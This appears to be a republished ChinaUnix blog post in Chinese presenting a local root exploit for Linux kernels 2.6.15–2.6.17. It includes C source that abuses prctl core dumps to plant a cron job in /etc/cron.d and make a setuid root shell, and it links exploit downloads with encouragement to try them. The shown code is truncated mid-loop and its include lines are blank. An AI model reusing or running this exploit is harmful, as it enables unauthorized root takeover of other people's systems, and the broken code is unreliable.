获取linux 2.6.15 root权限

sjhf

                先介绍下cron，crontab文件可以让系统定时执行工作（相当于windows上的task计划），Cron是一个常驻程序(daemon)，在开机时激活cron的daemon时，它会自动去检查相关目录，看看是否有任何cron文件。每一个user的可以去设定自己所要排定执行的工作。系统会定期执行 /etc/下的cron.d、cron.daily、cron.hourly、cron.weekly、cron.monthly目录下的命令。
我们关心的是怎么让它产生core dump，然后获取root权限。
正文]：
/*
*getroot.c
* 2006/11/08 Linux 2.6.15 Exp
* Modified by gz1X
* Thx to:
*

Marco Ivaldi  
*

Julien TINNES
*
* Usage:
* $ gcc getroot.c -o getroot -Wall
* $ ./getroot
*
* test on dubuntu 2.6.15-23-686
* theoretically it will work on 2.6.15-2.6.17
*/
#include
#include
#include
#include
#include
#include
#include
char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * *   root    chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";
int main() {
    int id,i;
    struct rlimit   corelimit={RLIM_INFINITY, RLIM_INFINITY};
    system("cp /bin/sh /tmp/sh");
    setrlimit(RLIMIT_CORE, &corelimit);
    if ( !( id = fork() )) {
        chdir("/etc/cron.d");
        prctl(PR_SET_DUMPABLE, 2);
        sleep(200);
        exit(1);
    }
    kill(id, SIGSEGV);
    fprintf(stderr, "Getting the root shell.Please wait...\n");
    for (i = 0; i
[*[下载]：
[color="#ff0000"]getroot.zip

附上Julien TINNES的攻击源代码，大家可以尝试之。攻击效果非常好。各种linux平台都没问题。
[color="#ff0000"]Julien TINNES-exp.zip

just enjoy!
:-)
               

本文来自ChinaUnix博客，如果查看原文请点：http://blog.chinaunix.net/u3/93926/showart_1875436.html